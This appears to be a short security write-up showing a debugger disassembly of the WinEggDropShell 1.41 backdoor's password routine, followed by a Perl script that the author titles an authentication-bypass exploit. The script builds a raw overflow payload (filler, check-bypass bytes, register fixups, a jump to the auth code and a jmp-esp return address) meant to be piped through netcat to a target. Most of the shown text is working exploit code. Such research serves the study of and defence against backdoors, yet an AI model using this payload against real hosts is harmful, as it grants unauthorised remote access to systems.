Author: joestewart

# Views: 34785

Printer Friendly ...

Editing PE characteristics in Stud_PE

	1000209E  PUSH EBP
	1000209F  MOV EBP,ESP
	100020A1  SUB ESP,1AC
	100020A7  MOV ECX,6B
	100020AC  /DEC ECX
	100020AD  |MOV DWORD PTR SS:[ESP+ECX*4],FFFA5A5A
	100020B4  \JNZ SHORT TBack.100020AC
	100020B6  PUSH ESI
	100020B7  PUSH EDI
	100020B8  MOV EDI,DWORD PTR SS:[EBP+8]
	100020BB  MOV DWORD PTR SS:[EBP+8],EDI
	100020BE  MOV DWORD PTR SS:[EBP-188],0
	100020C8  PUSH TBack.1003EC0D             ; /<%s> = "Enter Password:"
	100020CD  PUSH TBack.10015210             ; |<%s> = ""
	100020D2  PUSH TBack.1003EC1D             ; |format = "%s%s"
	100020D7  LEA EDI,DWORD PTR SS:[EBP-180]  ; |
	100020DD  PUSH EDI                        ; |s
	100020DE  CALL TBack.10014E1C             ; \sprintf
	100020E3  ADD ESP,10
	100020E6  LEA EDI,DWORD PTR SS:[EBP-180]
	100020EC  PUSH EDI                        ; /Arg2
	100020ED  PUSH DWORD PTR SS:[EBP+8]       ; |Arg1
	100020F0  CALL TBack.100067C5             ; \TBack.100067C5
	100020F5  ADD ESP,8
	100020F8  PUSH 100                        ; /n = 100 (256.)
	100020FD  PUSH 0                          ; |c = 00
	100020FF  LEA EDI,DWORD PTR SS:[EBP-180]  ; |
	10002105  PUSH EDI                        ; |s
	10002106  CALL TBack.10014DEC             ; \memset
	1000210B  ADD ESP,0C
	1000210E  CALL TBack.10014978             ; [GetTickCount]
	10002113  MOV DWORD PTR SS:[EBP-184],EAX
	10002119  /PUSH 80                        ; /n = 80 (128.)
	1000211E  |PUSH 0                         ; |c = 00
	10002120  |LEA EDI,DWORD PTR SS:[EBP-80]  ; |
	10002123  |PUSH EDI                       ; |s
	10002124  |CALL TBack.10014DEC            ; \memset
	10002129  |ADD ESP,0C
	1000212C  |PUSH 0                         ; /Flags = 0
	1000212E  |PUSH 100                       ; |BufSize = 100 (256.)
	10002133  |LEA EDI,DWORD PTR SS:[EBP-80]  ; |
	10002136  |PUSH EDI                       ; |Buffer
	10002137  |PUSH DWORD PTR SS:[EBP+8]      ; |Socket
	1000213A  |CALL TBack.10014718            ; \recv

    #!/usr/bin/perl
    
    ## usage: ./weds.pl | nc  
    
    $| = 1;
    
    print STDERR "WinEggDropShell 1.41 Authentication Bypass Exploit\n";
    print STDERR "By Joe Stewart <joe\@joestewart.org>\n";
    
    print "\x90" x 109;                   # filler
    print "\x0a\x00";                     # newline + null to pass check
    print "\x8d\xac\x24\x28\x04\x00\x00"; # LEA EBP,[ESP+428]   // fixup ebp
    print "\x83\xc4\x04";                 # ADD ESP,4           // fixup esp
    print "\xb8\xb8\x33\x00\x10";         # MOV EAX, 0x100033B8 // auth target
    print "\xff\xe0";                     # JMP EAX             // go there
    print "\x90\x90\x90\x90";             # doesn't matter
    print "\xa3\x39\x00\x10";             # location of jmp esp
    print "\xeb\xe5";                     # jump to shellcode
    
    while () {
        print;
    }